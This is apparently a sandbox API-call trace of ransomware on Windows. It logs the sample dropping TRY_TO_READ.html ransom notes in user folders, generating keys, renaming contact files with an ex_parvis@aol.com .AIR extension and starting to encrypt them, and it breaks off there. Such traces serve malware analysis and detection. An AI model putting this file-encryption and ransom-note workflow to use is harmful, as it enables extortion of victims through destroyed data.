	[0099.561] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.561] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.561] GetLastError () returned 0x0
	[0099.562] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x374
	[0099.563] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589558 | out: hHeap=0x540000) returned 1
	[0099.563] WriteFile (in: hFile=0x374, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0099.564] WriteFile (in: hFile=0x374, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0099.564] WriteFile (in: hFile=0x374, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0099.564] CloseHandle (hObject=0x374) returned 1
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596400 | out: hHeap=0x540000) returned 1
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9360 | out: hHeap=0x540000) returned 1
	[0099.564] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.564] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.564] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.564] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.564] GetLastError () returned 0x0
	[0099.564] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x374
	[0099.565] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0099.565] WriteFile (in: hFile=0x374, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0099.566] WriteFile (in: hFile=0x374, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0099.566] WriteFile (in: hFile=0x374, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0099.566] CloseHandle (hObject=0x374) returned 1
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596400 | out: hHeap=0x540000) returned 1
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d93c8 | out: hHeap=0x540000) returned 1
	[0099.566] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.566] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.566] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.566] GetLastError () returned 0x0
	[0099.566] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x374
	[0099.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589558 | out: hHeap=0x540000) returned 1
	[0099.567] WriteFile (in: hFile=0x374, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0099.567] WriteFile (in: hFile=0x374, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0099.567] WriteFile (in: hFile=0x374, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0099.567] CloseHandle (hObject=0x374) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5895e0 | out: hHeap=0x540000) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596400 | out: hHeap=0x540000) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9430 | out: hHeap=0x540000) returned 1
	[0099.568] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca71a630, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca71a630, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.568] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.568] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.568] GetLastError () returned 0xb7
	[0099.568] FindNextFileW (in: hFindFile=0x5da470, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca71a630, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca71a630, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0099.568] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x70) returned 0x591a38
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a1038 | out: hHeap=0x540000) returned 1
	[0099.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5490 | out: hHeap=0x540000) returned 1
	[0099.568] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca71a630, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca71a630, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x60) returned 0x5d9290
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x591a38 | out: hHeap=0x540000) returned 1
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b788 | out: hHeap=0x540000) returned 1
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0099.569] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da4b0
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.569] GetLastError () returned 0x5
	[0099.569] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.569] GetLastError () returned 0x5
	[0099.569] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2ea7ef20, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x49a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact", cAlternateFileName="ACLVIH~1.CON")) returned 1
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.569] GetLastError () returned 0x5
	[0099.569] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.569] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.569] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.570] GetLastError () returned 0x5
	[0099.570] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0099.570] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x589668 | out: hHeap=0x540000) returned 1
	[0099.570] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x555010
	[0099.571] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589668
	[0099.571] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x555010 | out: hHeap=0x540000) returned 1
	[0099.571] GetLastError () returned 0x5
	[0099.571] FindNextFileW (in: hFindFile=0x5da4b0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca740790, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca740790, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca740790, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0099.571] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x589228
	[0099.571] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0099.571] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0099.571] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0099.571] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0099.571] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1
	[0099.572] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 61
	[0099.572] GetProcessHeap () returned 0x540000
	[0099.572] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x598b60
	[0099.572] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact"
	[0099.572] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR"
	[0099.572] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0099.574] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0099.574] GetProcessHeap () returned 0x540000
	[0099.574] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0099.574] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1172) returned 1
	[0099.574] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x494
	[0099.574] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0099.574] GetProcessHeap () returned 0x540000
	[0099.575] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
